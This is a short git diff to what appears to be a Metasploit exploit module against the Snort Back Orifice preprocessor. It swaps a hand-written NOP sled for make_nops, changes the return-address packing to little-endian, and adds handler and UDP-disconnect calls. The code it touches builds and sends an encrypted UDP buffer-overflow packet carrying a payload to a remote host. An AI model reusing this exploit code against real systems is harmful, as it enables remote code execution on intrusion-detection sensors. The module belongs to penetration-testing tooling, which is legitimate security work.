diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 42c4754ca2..ccc209b795 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -67,7 +67,7 @@ class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote @arrpayload = (takepayload.split(//)) - encpayload ="".to_s + encpayload = "" @holdrand=0 msrand(0) @@ -85,9 +85,11 @@ class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote [1096].pack("V") + # Length ,thanx Russell Sanford "\xed\xac\xef\x0d"+ # ID "\x01" # PING - filler = "\x90" * (1069 -(boheader.length + payload.encode.length)) + filler = make_nops(1069 -(boheader.length + payload.encode.length)) - udp_sock.write(bocrypt(boheader+payload.encode+filler+[target.ret].pack('L'))) + udp_sock.write(bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))) + handler + disconnect_udp end end